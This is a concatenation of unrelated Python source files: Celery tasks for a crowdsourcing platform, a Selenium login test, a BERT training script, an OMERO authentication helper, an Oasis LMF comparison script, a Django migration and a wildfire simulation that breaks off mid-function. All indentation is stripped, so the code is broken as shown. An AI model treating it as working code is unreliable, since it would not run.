INNER JOIN get_worker_ratings(u_workers.id) worker_ratings
ON worker_ratings.requester_id = available.owner_id
AND (coalesce(worker_ratings.worker_rating, 1.99) >= available.min_rating)
LEFT OUTER JOIN crowdsourcing_WorkerProjectNotification n
ON n.project_id = available.group_id AND n.worker_id = u_workers.id
INNER JOIN crowdsourcing_userpreferences pref ON pref.user_id = u_workers.id
INNER JOIN auth_user owner ON owner.id = available.owner_id
INNER JOIN crowdsourcing_userprofile owner_profile ON owner_profile.user_id = owner.id
LEFT OUTER JOIN (
SELECT
p.id,
tw.worker_id,
count(tw.id) tasks_done
FROM crowdsourcing_project p
INNER JOIN crowdsourcing_task t ON p.id = t.project_id
LEFT OUTER JOIN crowdsourcing_taskworker tw ON tw.task_id = t.id
GROUP BY p.id, tw.worker_id
) worker_project ON worker_project.id = available.id
AND worker_project.worker_id = u_workers.id
WHERE n.id IS NULL AND pref.new_tasks_notifications = TRUE AND coalesce(worker_project.tasks_done, 0) = 0
GROUP BY available.id, available.group_id, owner_profile.handle, u_workers.id, u_workers.email, available.name,
available.price, available.aux_attributes;
'''
try:
cursor.execute(email_query, {})
workers = cursor.fetchall()
worker_project_notifications = []
for worker in workers:
try:
send_new_tasks_email(to=worker[5], project_id=worker[0],
project_name=worker[6], price=worker[7],
available_tasks=worker[4], requester_handle=worker[2])
worker_project_notifications.append(models.WorkerProjectNotification(project_id=worker[1],
worker_id=worker[3]))
except Exception as e:
print(e)
models.WorkerProjectNotification.objects.bulk_create(worker_project_notifications)
except Exception as e:
print(e)
cursor.close()
# for task in tasks:
# logs.append(models.BoomerangLog(object_id=task[1], min_rating=task[2], object_type='task',
# rating_updated_at=task[3],
# reason='DEFAULT'))
models.BoomerangLog.objects.bulk_create(logs)
return 'SUCCESS: {} rows affected'.format(cursor.rowcount)
@celery_app.task(ignore_result=True)
def update_project_boomerang(project_id):
project = models.Project.objects.filter(pk=project_id).first()
if project is not None:
project.min_rating = 3.0
# project.rating_updated_at = timezone.now()
project.save()
models.BoomerangLog.objects.create(object_id=project.group_id, min_rating=project.min_rating,
rating_updated_at=project.rating_updated_at, reason='RESET')
return 'SUCCESS'
@celery_app.task
def background_task(function, **kwargs):
function(**kwargs)
return 'SUCCESS'
# Payment Tasks
@celery_app.task(ignore_result=True)
def create_account_and_customer(user_id, ip_address):
from crowdsourcing.payment import Stripe
try:
user = User.objects.get(pk=user_id)
Stripe().create_account_and_customer(user=user, country_iso=user.profile.address.city.country.code,
ip_address=ip_address)
except User.DoesNotExist:
return 'User does not exist'
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def refund_charges_before_expiration():
from crowdsourcing.payment import Stripe
charges = models.StripeCharge.objects.filter(expired=False, balance__gt=50,
created_at__gt=timezone.now() - settings.STRIPE_CHARGE_LIFETIME)
for charge in charges:
try:
Stripe().refund(charge=charge, amount=charge.balance)
charge.expired = True
charge.expired_at = timezone.now()
charge.save()
except Exception:
pass
@celery_app.task(ignore_result=True)
def notify_workers(project_id, worker_ids, subject, message):
project = models.Project.objects.values('owner').get(id=project_id)
user = User.objects.get(id=project['owner'])
provider = get_provider(user)
if provider is None:
return
provider.notify_workers(worker_ids=worker_ids, subject=subject, message_text=message)
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def send_return_notification_email(return_feedback_id, reject=False):
feedback = models.ReturnFeedback.objects.prefetch_related('task_worker', 'task_worker__worker',
'task_worker__task__project',
'task_worker__task__project__owner__profile').get(
id=return_feedback_id)
if not feedback.notification_sent:
if not reject:
send_task_returned_email(to=feedback.task_worker.worker.email,
requester_handle=feedback.task_worker.task.project.owner.profile.handle,
project_name=feedback.task_worker.task.project.name[:32],
task_id=feedback.task_worker.task_id,
return_reason=feedback.body,
requester_email=feedback.task_worker.task.project.owner.email)
else:
send_task_rejected_email(to=feedback.task_worker.worker.email,
requester_handle=feedback.task_worker.task.project.owner.profile.handle,
project_name=feedback.task_worker.task.project.name[:32],
task_id=feedback.task_worker.task_id,
reject_reason=feedback.body,
requester_email=feedback.task_worker.task.project.owner.email)
feedback.notification_sent = True
feedback.notification_sent_at = timezone.now()
feedback.save()
@celery_app.task(ignore_result=True)
def check_project_completed(project_id):
query = '''
SELECT
count(t.id) remaining
FROM crowdsourcing_task t INNER JOIN (SELECT
group_id,
max(id) id
FROM crowdsourcing_task
WHERE deleted_at IS NULL
GROUP BY group_id) t_max ON t_max.id = t.id
INNER JOIN crowdsourcing_project p ON p.id = t.project_id
INNER JOIN (
SELECT
t.group_id,
sum(t.others) OTHERS
FROM (
SELECT
t.group_id,
CASE WHEN tw.id IS NOT NULL THEN 1 ELSE 0 END OTHERS
FROM crowdsourcing_task t
LEFT OUTER JOIN crowdsourcing_taskworker tw
ON (t.id = tw.task_id AND tw.status NOT IN (4, 6, 7))
WHERE t.exclude_at IS NULL AND t.deleted_at IS NULL) t
GROUP BY t.group_id) t_count ON t_count.group_id = t.group_id
WHERE t_count.others < p.repetition AND p.id=(%(project_id)s)
GROUP BY p.id;
'''
params = {
"project_id": project_id
}
cursor = connection.cursor()
cursor.execute(query, params)
remaining_count = cursor.fetchall()[0][0] if cursor.rowcount > 0 else 0
print(remaining_count)
if remaining_count == 0:
with transaction.atomic():
project = models.Project.objects.select_for_update().get(id=project_id)
if project.is_prototype:
feedback = project.comments.all()
if feedback.count() > 0 and feedback.filter(ready_for_launch=True).count() / feedback.count() < 0.66:
# mandatory stop
pass
else:
from crowdsourcing.serializers.project import ProjectSerializer
from crowdsourcing.viewsets.project import ProjectViewSet
needs_workers = project.repetition < project.aux_attributes.get('repetition', project.repetition)
needs_tasks = project.tasks.filter(exclude_at__isnull=True).count < project.aux_attributes.get(
'number_of_tasks')
if needs_workers or needs_tasks:
serializer = ProjectSerializer()
revision = ProjectSerializer.create_revision(project)
revision.repetition = revision.aux_attributes.get('repetition', project.repetition)
revision.is_prototype = False
revision.save()
serializer.create_tasks(revision.id, False)
total_needed = ProjectViewSet.calculate_total(revision)
to_pay = (Decimal(total_needed) - revision.amount_due).quantize(Decimal('.01'),
rounding=ROUND_UP)
revision.amount_due = total_needed if total_needed is not None else 0
if to_pay * 100 > revision.owner.stripe_customer.account_balance:
return 'FAILED'
else:
serializer = ProjectSerializer(instance=revision, data={})
if serializer.is_valid():
serializer.publish(to_pay)
return 'SUCCESS'
else:
send_project_completed(to=project.owner.email, project_name=project.name, project_id=project_id)
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def post_to_discourse(project_id):
from crowdsourcing.discourse import DiscourseClient
instance = models.Project.objects.get(id=project_id)
aux_attrib = instance.aux_attributes
if 'median_price' in aux_attrib:
price = aux_attrib['median_price']
if price is not None and float(price) > 0:
price = float(price)
else:
price = instance.price
else:
price = instance.price
# post topic as system user
client = DiscourseClient(
settings.DISCOURSE_BASE_URL,
api_username='system',
api_key=settings.DISCOURSE_API_KEY)
if instance.discussion_link is None:
try:
topic = client.create_topic(title=instance.name,
category=settings.DISCOURSE_TOPIC_TASKS,
timeout=instance.timeout,
price=price,
requester_handle=instance.owner.profile.handle,
project_id=project_id)
if topic is not None:
url = '/t/%s/%d' % (topic['topic_slug'], topic['topic_id'])
instance.discussion_link = url
instance.topic_id = topic['topic_id']
instance.post_id = topic['id']
instance.save()
# watch as requester
client = DiscourseClient(
settings.DISCOURSE_BASE_URL,
api_username=instance.owner.profile.handle,
api_key=settings.DISCOURSE_API_KEY)
client.watch_topic(topic_id=topic['topic_id'])
except Exception as e:
print(e)
print 'failed to create or watch topic'
else:
# handle if any details changed and update first post again
if instance.topic_id > 0 and instance.post_id > 0:
preview_url = "%s/task-feed/%d" % (settings.SITE_HOST, project_id)
content = "**Title**: [%s](%s) \n" \
"**Requester**: @%s\n" \
"**Price** : USD %.2f \n" \
"**Timeout** : %s \n" % (instance.name, preview_url, instance.owner.profile.handle, price,
instance.timeout)
try:
client.update_post(
post_id=instance.post_id,
edit_reason='updating project parameters',
content=content)
except Exception as e:
print(e)
print 'failed to update post'
|
import unittest
import os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from test.browser import getDriver
from app import app
from app.model.user import User
app_url = app.config.get('APP_URL')
app_port = app.config.get('APP_PORT')
app_domain = f'{app_url}:{app_port}'
class TestLoginPage(unittest.TestCase):
def setUp(self):
print('Testing login page..')
os.system('flask db:fresh')
self.driver = webdriver.Chrome()
def tearDown(self):
os.system('flask db:fresh')
self.driver.quit()
def test_login(self):
#self.driver.implicitly_wait(10)
self.driver.get(f'{app_domain}/login')
user = User()
user.username = 'Example'
user.email = 'example@gmail.com'
user.password = 'examplepassword'
user.user_id = 32
user.save()
email = self.driver.find_element_by_name('user_email')
password = self.driver.find_element_by_name('pass')
email.send_keys('example@gmail.com')
password.send_keys('examplepassword')
submit_button = self.driver.find_element_by_id('submit_button')
submit_button.send_keys(Keys.ENTER)
current_url = self.driver.current_url
self.assertEqual(current_url, f'{app_domain}/')
if __name__ == '__main__':
unittest.main()
|
import config
import dataset
import os
import engine
import torch
import utils
import params
import sandesh
import pandas as pd
import torch.nn as nn
import numpy as np
from torch.optim import lr_scheduler
from model import TweetModel
from sklearn import model_selection
from sklearn import metrics
import transformers
from transformers import AdamW
from transformers import get_linear_schedule_with_warmup
from apex import amp
def run(fold):
dfx = pd.read_csv(config.TRAINING_FILE)
df_train = dfx[dfx.kfold != fold].reset_index(drop=True)
df_valid = dfx[dfx.kfold == fold].reset_index(drop=True)
print(df_train.shape)
print(df_valid.shape)
train_dataset = dataset.TweetDataset(
tweet=df_train.text.values,
sentiment=df_train.sentiment.values,
selected_text=df_train.selected_text.values
)
train_data_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=config.TRAIN_BATCH_SIZE,
num_workers=4
)
valid_dataset = dataset.TweetDataset(
tweet=df_valid.text.values,
sentiment=df_valid.sentiment.values,
selected_text=df_valid.selected_text.values
)
valid_data_loader = torch.utils.data.DataLoader(
valid_dataset,
batch_size=config.VALID_BATCH_SIZE,
num_workers=2
)
device = torch.device("cuda")
model_config = transformers.BertConfig.from_pretrained(config.BERT_PATH)
model_config.output_hidden_states = True
model = TweetModel(conf=model_config)
model.to(device)
num_train_steps = int(len(df_train) / config.TRAIN_BATCH_SIZE * config.EPOCHS)
optimizer = AdamW(params.optimizer_params(model), lr=5e-5)
scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0, num_training_steps=num_train_steps)
model, optimizer = amp.initialize(model, optimizer, opt_level="O1", verbosity=0)
es = utils.EarlyStopping(patience=5, mode="max")
sandesh.send("Training is Starting")
for epoch in range(config.EPOCHS):
engine.train_fn(train_data_loader, model, optimizer, device, scheduler=scheduler)
jaccard = engine.eval_fn(valid_data_loader, model, device)
print(f"Jaccard Score = {jaccard}")
sandesh.send(f"Epoch={epoch}, Jaccard={jaccard}")
es(jaccard, model, model_path=f"model_{fold}.bin")
if es.early_stop:
print("Early stopping")
break
if __name__ == "__main__":
FOLD = int(os.environ.get("FOLD"))
run(fold=FOLD)
|
"""Use an omero server to authenticate user and gather group info
This is heaviliy inspired by https://flask-ldap3-login.readthedocs.io/
"""
import logging
import omero
from flask_ldap3_login import AuthenticationResponseStatus
from omero.gateway import BlitzGateway
from enum import Enum
log = logging.getLogger(__name__)
class AuthenticationResponse:
"""
A response object when authenticating. Lets us pass status codes around
and also user data.
Args:
status (AuthenticationResponseStatus): The status of the result.
user_info (dict): User info dictionary obtained from omero.
"""
# From flask-ldap3-login, thanks
def __init__(
self,
status=AuthenticationResponseStatus.fail,
user_info=None,
):
self.user_info = user_info
self.status = status
class OmeroLoginManager:
def __init__(self, app=None):
self.app = app
self.config = {}
self._save_user = None
if app is not None:
self.init_app(app)
def init_app(self, app):
"""Configures this extension with the given app. This registers a
``teardown_appcontext`` call, and attaches this ``OmeroLoginManager``
to it as ``app.omero_login_manager``.
Args:
app (flask.Flask): The flask app to initialise with
"""
app.omero_login_manager = self
self.init_config(app.config)
def init_config(self, config):
"""
Configures this extension with a given configuration dictionary.
This allows use of this extension without a flask app.
Args:
config (dict): A dictionary with configuration keys
"""
self.config.update(config)
self.config.setdefault("OMERO_PORT", 4064)
self.config.setdefault("OMERO_HOST", "localhost")
log.info(
"Setting omero host to %s:%d",
self.config["OMERO_HOST"],
self.config["OMERO_PORT"],
)
def authenticate(self, username, password):
client = omero.client(
host=self.config["OMERO_HOST"], port=self.config["OMERO_PORT"]
)
session = client.createSession(username, password)
with BlitzGateway(client_obj=client) as conn:
if conn.isConnected():
log.info("succesfully connected to OMERO")
response = AuthenticationResponse(
status=AuthenticationResponseStatus.success,
user_info=self.get_user_info(conn),
)
else:
response = AuthenticationResponse(
status=AuthenticationResponseStatus.fail, user_info={}
)
return response
def get_user_info(self, conn):
user = conn.getUser()
info = {
"username": user.getName(),
"fullname": user.getFullName(),
"groupname": conn.getGroupFromContext().getName(),
"groups": [g.getName() for g in conn.getGroupsMemberOf()],
}
log.info("Found user info: %s", info)
return info
def save_user(self, callback):
"""
This sets the callback for saving a user that has been looked up from
from ldap.
The function you set should take a user dn (unicode), username
(unicode) and userdata (dict), and memberships (list).
::
@ldap3_manager.save_user
def save_user(dn, username, userdata, memberships):
return User(username=username, data=userdata)
Your callback function MUST return the user object in your ORM
(or similar). as this is used within the LoginForm and placed
at ``form.user``
Args:
callback (function): The function to be used as the save user
callback.
"""
self._save_user = callback
return callback
|
from plugins import moderation
from plugins import tournaments
from plugins import messages
from plugins import workshop
from plugins.games import *
|
import json
import os
from pathlib import Path
from subprocess import Popen
from typing import Dict
import pandas as pd
mdk_config = {
"analysis_settings_json": "analysis_settings.json",
"lookup_data_dir": "keys_data",
"lookup_module_path": "src/keys_server/ParisWindstormKeysLookup.py",
"model_data_dir": "model_data",
"model_version_csv": "keys_data/ModelVersion.csv",
"oed_accounts_csv": "tests/account.csv",
"oed_location_csv": "tests/location.csv",
"hashed_group_id": True
}
def get_recent_run_path() -> str:
path_string: str = str(Path.cwd()) + "/runs/"
path = Path(path_string)
for directory in [str(f) for f in path.iterdir() if f.is_dir()]:
if "losses" in directory:
return directory
def rename_directory(directory_path: str, new_file_name: str) -> str:
buffer = directory_path.split("/")
buffer[-1] = new_file_name
new_path: str = "/".join(buffer)
os.rename(directory_path, new_path)
return new_path
def get_output_files(run_directory: str) -> Dict[str, str]:
output_path: str = run_directory + "/output/"
output = dict()
output["gul_S1_aalcalc.csv"] = output_path + "gul_S1_aalcalc.csv"
output["gul_S1_eltcalc.csv"] = output_path + "gul_S1_eltcalc.csv"
output["gul_S1_leccalc_full_uncertainty_aep.csv"] = output_path + "gul_S1_leccalc_full_uncertainty_aep.csv"
output["gul_S1_leccalc_full_uncertainty_oep.csv"] = output_path + "gul_S1_leccalc_full_uncertainty_oep.csv"
output["gul_S1_summary-info.csv"] = output_path + "gul_S1_summary-info.csv"
output["il_S1_aalcalc.csv"] = output_path + "il_S1_aalcalc.csv"
output["il_S1_eltcalc.csv"] = output_path + "il_S1_eltcalc.csv"
output["il_S1_leccalc_full_uncertainty_aep.csv"] = output_path + "il_S1_leccalc_full_uncertainty_aep.csv"
output["il_S1_leccalc_full_uncertainty_oep.csv"] = output_path + "il_S1_leccalc_full_uncertainty_oep.csv"
output["il_S1_summary-info.csv"] = output_path + "il_S1_summary-info.csv"
return output
def compare_data(hash_output_dict: Dict[str, str], none_hash_output_dict: Dict[str, str], key: str) -> None:
hash_data_path: str = hash_output_dict[key]
none_hash_data_path: str = none_hash_output_dict[key]
hash_df = pd.read_csv(hash_data_path, index_col=False)
non_hash_df = pd.read_csv(none_hash_data_path, index_col=False)
difference = pd.concat([hash_df, non_hash_df]).drop_duplicates(keep=False)
print(f"left number is {len(hash_df)} right number is {len(non_hash_df)}")
if len(difference) > 0:
print(f"the difference between hash and none hash for {key} is {len(difference)}")
print(difference.head())
else:
print(f"there is no difference between hash and none hash for {key}")
def generate_location_data(remove_location: bool = False) -> pd.DataFrame:
data = [
[1,1,1,"Hotel Ronceray Opera",48.874979,2.30887,5150,1000000,0,0,0,"WTC","EUR","FR",10000,500000],
[1,1,2,"Gare Du Nord",48.876918,2.324729,5050,2000000,0,0,0,"WTC","EUR","FR",25000,1000000],
[1,1,3,"Art Supply Store",48.85324,2.387931,5150,500000,0,0,0,"WTC","EUR","FR",0,0]
]
if remove_location is True:
data = data[1:]
columns = [
"PortNumber","AccNumber","LocNumber","LocName","Latitude","Longitude","ConstructionCode","BuildingTIV",
"OtherTIV","ContentsTIV","BITIV","LocPerilsCovered","LocCurrency","CountryCode","LocDed6All","LocLimit6All"
]
df = pd.DataFrame(data, columns=columns)
return df
if __name__ == "__main__":
# cleanup the previous runs
main_path: str = str(Path.cwd())
remove_runs = Popen(f"rm -r ./runs/", shell=True)
remove_runs.wait()
# setup the datasets for locations
# "oed_location_csv": "tests/location.csv"
locations = generate_location_data()
reduced_locations = generate_location_data(remove_location=True)
# write the location data
locations.to_csv("./tests/full_locations.csv", index=False)
reduced_locations.to_csv("./tests/reduced_locations.csv", index=False)
mdk_config["oed_location_csv"] = "tests/full_locations.csv"
# update the local oasislmf pip module
update_oasislmf = Popen("screw-update-local-oasislmf")
update_oasislmf.wait()
# write the new MDK config
with open(f"./hash_test_mdk.json", "w") as file:
file.write(json.dumps(mdk_config))
run_model = Popen(f"oasislmf model run --config ./hash_test_mdk.json", shell=True)
run_model.wait()
hash_run_path: str = rename_directory(directory_path=get_recent_run_path(), new_file_name="full_location_run")
mdk_config["oed_location_csv"] = "tests/reduced_locations.csv"
with open(f"./none_hash_test_mdk.json", "w") as file:
file.write(json.dumps(mdk_config))
run_model = Popen(f"oasislmf model run --config ./none_hash_test_mdk.json", shell=True)
run_model.wait()
none_hash_run_path: str = rename_directory(directory_path=get_recent_run_path(), new_file_name="reduced_locations_run")
hashed_outputs = get_output_files(run_directory=hash_run_path)
none_hashed_outputs = get_output_files(run_directory=none_hash_run_path)
for key in hashed_outputs.keys():
compare_data(hash_output_dict=hashed_outputs, none_hash_output_dict=none_hashed_outputs, key=key)
os.remove(f"./hash_test_mdk.json")
os.remove(f"./none_hash_test_mdk.json")
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FacebookUser',
fields=[
('user_ptr', models.OneToOneField(serialize=False, primary_key=True, to=settings.AUTH_USER_MODEL, auto_created=True)),
('user_id', models.BigIntegerField(unique=True)),
('scope', models.CharField(default='', max_length=512, blank=True)),
('app_friends', models.ManyToManyField(to='facebook_auth.FacebookUser')),
],
options={
'verbose_name': 'user',
'abstract': False,
'verbose_name_plural': 'users',
},
bases=('auth.user',),
),
migrations.CreateModel(
name='UserToken',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),
('provider_user_id', models.CharField(max_length=255)),
('token', models.TextField(unique=True)),
('granted_at', models.DateTimeField(auto_now_add=True)),
('expiration_date', models.DateTimeField(default=None, null=True, blank=True)),
('deleted', models.BooleanField(default=False)),
],
options={
'verbose_name': 'User token',
'verbose_name_plural': 'User tokens',
},
bases=(models.Model,),
),
]
|
__version__ = "0.0.4"
__author__ = 'Mario Duran-Vega'
__credits__ = 'QOSF'
from .q_simulator import *
|
from typing import Any, Dict
import tqdm
from pytools.pytorch import distributed
from pytools.pytorch.engines.callbacks import Callback
from pytools.pytorch.summary import Summary
from pytools.pytorch.typing import Engine
from pytools.pyutils.logging.group import LogGroup, global_group
from pytools.pyutils.logging.handler import CallbackHandler
from pytools.pyutils.misc.string import WildCardMatcher
__all__ = ['ShowEpochProgress']
class ShowEpochProgress(Callback):
def __init__(
self,
summary: Summary,
matcher: WildCardMatcher = WildCardMatcher("*"),
*,
logger_group: LogGroup = global_group,
num_digits: int = 3,
console_handler_key: str = "__default_console__"
):
self._bar = None
self._logger_group = logger_group
self._num_digits = num_digits
self._console_handler_key = console_handler_key
self._context = None
self._summary = summary
self._matcher = matcher
def prior_epoch(self, engine, data_loader):
if distributed.is_local_master():
self._bar = tqdm.tqdm(total=len(data_loader), ncols=0, leave=False)
self._context = self._logger_group.switch_handler_context(
self._console_handler_key, CallbackHandler(self._bar.write))
self._context.__enter__()
def after_batch(self, engine: Engine, inputs: Dict[str, Any], outputs: Dict[str, Any]):
if distributed.is_local_master():
texts = []
for name in sorted(self._summary.names()):
if self._matcher.match(name) and self._summary[name].indices[-1] == engine.global_step:
texts.append(f'[{name}] = {self._summary[name].get_value():.{self._num_digits}g}')
if texts:
self._bar.set_description(', '.join(texts))
self._bar.update()
def after_epoch(self, engine, data_loader):
if distributed.is_local_master():
self._bar.close()
self._bar = None
self._context.__exit__(None, None, None)
self._context = None
|
from .interface import Interface
__all__ = [
'Interface',
]
|
# coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
|
"""
Author : Abraham Flores
File : MCWildFire.py
Language : Python 3.5
Created : 12/7/2017
Edited : 12/18/2017
San Digeo State University
MTH 636 : Mathematical Modeling
"""
import math,random,os,glob
from random import shuffle
from scipy.stats import uniform
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import seaborn as sns
import numpy as np
class Forestry:
def __init__(self,name_,fuel_,moisture_=0,wind_=0,elevation_=0):
self.name = name_
self.fuel = fuel_
self.moisture = moisture_
self.wind = wind_
self.elevation = elevation_
self.burning = False
self.putout = False
self.transistionSPECIES = ''
self.transistionTIME = 1
def __str__(self):
return "Species: " + self.name
def __repr__(self):
return "Species: " + self.name
def SetTransistion(self,name_,time_):
self.transistionSPECIES = name_
self.transistionTIME = time_
def GetSpecies(self):
return self.name
def GetNext(self):
return self.transistionSPECIES
def Update(self):
self.transistionTIME -= 1
def Transistion(self,name_,fuel_):
self.name = name_
self.fuel = fuel_
self.burning = False
self.putout = False
def Pburn(self,weights_=[1,0,0,0],intensity=1):
if self.putout or self.fuel == 0:
return 0
K = weights_[0]*self.fuel + weights_[1]*self.moisture + \
weights_[2]*self.wind + weights_[3]*self.elevation
probiblity_of_burn = (1-math.exp(-K))**intensity
return probiblity_of_burn
def SetOnFire(self):
self.burning = True
def Extinguished(self):
self.burning = False
self.putout = True
def UpdateElevation(self,elevation_):
self.elevation = elevation_
def UpdateWeather(self,moisture_,wind_):
self.moisture = moisture_
self.wind = wind_
def Burned(self):
self.name = "Burned"
self.fuel = 0
self.moisture = 0
self.wind = 0
self.elevation = 0
self.burning = False
class Forest:
def __init__(self,N_,ecosystem,weights_=[1,0,0,0]):
self.grid = []
self.N = N_
self.onFIRE = False
self.weights = weights_
self.names = []
self.fuels = dict()
self.distribution = dict()
self.SetWeatherFunc()
self.SetWildFireProb()
temp = []
for plant in ecosystem:
self.names.append(plant[0])
self.fuels[plant[0]] = plant[2]
self.distribution[plant[0]] = plant[1]
for i in range(plant[1]):
temp.append(Forestry(plant[0],plant[2]))
shuffle(temp)
shuffle(temp)
shuffle(temp)
for i in range(N_):
self.grid.append(temp[i*N_:(i+1)*N_])
self.SpeciesLocations = dict()
for name in self.names:
self.SpeciesLocations[name] = []
self.TransistionNames = \
{"Oak":["Transistion"],\
"Transistion":["Oak","Pine","Deciduous"],\
"Pine":["Transistion","Deciduous"],\
"Deciduous":["Transistion","Pine"],\
"Shrubland":["Oak","Pine","Deciduous","Transistion"],\
"Burned" :["Shrubland"]}
self.TransistionTimes = \
{"Shrubland":{"Pine":13,"Transistion":15,"Deciduous":13,"Oak":40},\
"Transistion":{"Pine":25,"Deciduous":23,"Oak":35},\
"Pine":{"Transistion":28,"Deciduous":20,},\
"Deciduous":{"Pine":25,"Transistion":35},\
"Oak":{"Transistion":30},\
"Burned":{"Shrubland":3}}
for x in range(N_):
for y in range(N_):
self.SpeciesLocations[self.grid[x][y].GetSpecies()].append((x,y))
nXt = self.NextState(x,y)
self.grid[x][y].SetTransistion(nXt,self.TransistionTimes[self.grid[x][y].name][nXt])
def CoefficentOfTransisiton(self,x,y,name):
if not (len(self.SpeciesLocations[name])):
return 0
#find all deciduous in plant_grid
dist = []
for x_ , y_ in self.SpeciesLocations[name]:
distance = 10*math.sqrt((x-x_)**2+(y-y_)**2)
if distance:
dist.append(distance)
x = min(dist)
#calculate the probability with that distance
if (name == "Deciduous" or name == "Pine"):
return math.exp(-5*x/100)
elif (name == "Oak"):
return (1/(x*2.34*math.sqrt(2*math.pi)))\
* math.exp(-(math.log(x) - 46.7)**2/(2*2.34**2))
elif (name == "Transistion"):
return (1/3.0)*(math.exp(-5*x/100) +\
math.exp(-5*x/100) + \
(1/(x*2.34*math.sqrt(2*math.pi))) * \
math.exp(-(math.log(x) - 46.7)**2/(2*2.34**2)))
else:
return 0
def NextState(self,x,y):
temp = [[],[]]
for name in self.TransistionNames[self.grid[x][y].name]:
temp[0].append(self.CoefficentOfTransisiton(x,y,name))
temp[1].append(name)
return temp[1][temp[0].index(max(temp[0]))]
def GetTransistionTime(self,x,y):
return self.grid
def Evolve(self):
for x in range(self.N):
for y in range(self.N):
if self.grid[x][y].transistionTIME == 0:
previous = self.grid[x][y].GetSpecies()
name = self.grid[x][y].GetNext()
self.distribution[name] += 1
self.distribution[previous] -= 1
self.SpeciesLocations[name].append((x,y))
self.SpeciesLocations[previous].remove((x,y))
self.grid[x][y].Transistion(name,self.fuels[name])
nXt = self.NextState(x,y)
self.grid[x][y].SetTransistion(nXt,self.TransistionTimes[name][nXt])
else:
self.grid[x][y].Update()
def GetDistribution(self):
dist = dict()
for key,value in self.distribution.items():
dist[key] = value/self.N**2
return dist
def SetElevations(self,elevation_data):
for x in range(self.N):
for y in range(self.N):
self.grid[x][y].UpdateElevation(elevation_data[x][y])
def SetWeatherFunc(self,WeatherFunc_=0):
if WeatherFunc_:
self.WeatherFunc = WeatherFunc_
else:
def foo (loc,day,yr):
return (0,0)
self.WeatherFunc = foo
def SetWildFireProb(self,ProbFunc_=0,r=1/10.0):
if ProbFunc_:
self.WildFireProb = ProbFunc_
else:
def foo (day,yr):
return r/365
self.WildFireProb = foo
def SetWeather(self,day,yr):
for x in range(self.N):
for y in range(self.N):
weather = self.WeatherFunc((x,y),day,yr)
self.grid[x][y].UpdateWeather(weather)
def UpdateWeights(self,weights_):
self.weights = weights_
def GetNeighbors(N,loc):
x_lower = -1
x_upper = 2
y_lower = -1
y_upper = 2
if (loc[0] == 0):
x_lower = 0
elif (loc[0] == N - 1):
x_upper = 1
if (loc[1] == 0):
y_lower = 0
elif (loc[1] == N - 1):
y_upper = 1
neighbors = []
for i in range(x_lower,x_upper):
for j in range(y_lower,y_upper):
x = loc[0] + i
y = loc[1] + j
neighbors.append((x,y))
neighbors.remove(loc)
return neighbors
def WildFire(self,FF_INFO,intial=(0,0),day_yr=(0,0),rand_intensity=False):
self.onFIRE = True
self.grid[intial[0]][intial[1]].SetOnFire()
Fire_Locations = [intial]
fire_fighters = 0
fire_fighters_max = False
while (self.onFIRE):
Spread_Locations = set()
if fire_fighters_max:
fire_fighters = FF_INFO[0]
else:
xp = 0
fire_fighters = 0
for coeff in FF_INFO[1]:
fire_fighters += int(coeff*len(Fire_Locations)**xp)
xp += 1
if fire_fighters > FF_INFO[0]:
fire_fighters = FF_INFO[0]
fire_fighters_max = True
for x,y in Fire_Locations:
#FireFighters Here
if fire_fighters > 0:
pExtinguished = FF_INFO[-1][self.grid[x][y].GetSpecies()]
if uniform.rvs(scale = 1,size=1)[0] < pExtinguished:
self.grid[x][y].Extinguished()
else:
self.distribution[self.grid[x][y].GetSpecies()] -= 1
self.distribution["Burned"] += 1
self.grid[x][y].SetTransistion("Shrubland",3)
self.SpeciesLocations["Burned"].append((x,y))
self.SpeciesLocations[self.grid[x][y].GetSpecies()].remove((x,y))
self.grid[x][y].Burned()
Spread_Locations.update(Forest.GetNeighbors(self.N,(x,y)))
fire_fighters -= 1
else:
self.distribution[self.grid[x][y].name] -= 1
self.distribution["Burned"] += 1
self.grid[x][y].SetTransistion("Shrubland",3)
self.SpeciesLocations["Burned"].append((x,y))
self.SpeciesLocations[self.grid[x][y].name].remove((x,y))
self.grid[x][y].Burned()
Spread_Locations.update(Forest.GetNeighbors(self.N,(x,y)))
Fire_Locations.clear()
for x,y in Spread_Locations:
if rand_intensity:
intensity = 1/uniform.rvs(scale = 2,size=1)[0]
else:
intensity = 1
W_ = self.WeatherFunc((x,y),day_yr[0],day_yr[1])
self.grid[x][y].UpdateWeather(W_[0],W_[1])
Probibility_of_Burn = self.grid[x][y].Pburn(self.weights,intensity)
if uniform.rvs(scale = 1,size=1)[0] < Probibility_of_Burn:
#Shits On Fire Yo
Fire_Locations.append((x,y))
self.grid[x][y].SetOnFire()
if len(Fire_Locations) == 0:
self.onFIRE = False
def WildFireGIF(self,FF_INFO,files,intial=(0,0),rand_intensity=False):
images = dict()
for key, value in files[0].items():
images[key] = mpimg.imread(value)
fire = mpimg.imread(files[1])
water = mpimg.imread(files[2])
fig, axarr = plt.subplots(self.N, self.N)
fig.set_size_inches(self.N*1.25, self.N)
plt.subplots_adjust(wspace=0, hspace=0)
for i in range(self.N):
for j in range(self.N):
axarr[i,j].imshow(images[self.grid[i][j].fuel])
axarr[i,j].axis('off')
#change directory gif directory
os.chdir('images/gifs')
outFile = "wildfires"
plt.savefig(outFile+"0000.png")
self.onFIRE = True
self.grid[intial[0]][intial[1]].SetOnFire()
Fire_Locations = [intial]
axarr[intial[0],intial[1]].cla()
axarr[intial[0],intial[1]].imshow(fire)
axarr[intial[0],intial[1]].axis('off')
plt.savefig(outFile+"0001.png")
fire_fighters = 0
fire_fighters_max = False
time = 1
while (self.onFIRE):
Spread_Locations = set()
if fire_fighters_max:
fire_fighters = FF_INFO[0]
else:
xp = 0
fire_fighters = 0
for coeff in FF_INFO[1]:
fire_fighters += int(coeff*len(Fire_Locations)**xp)
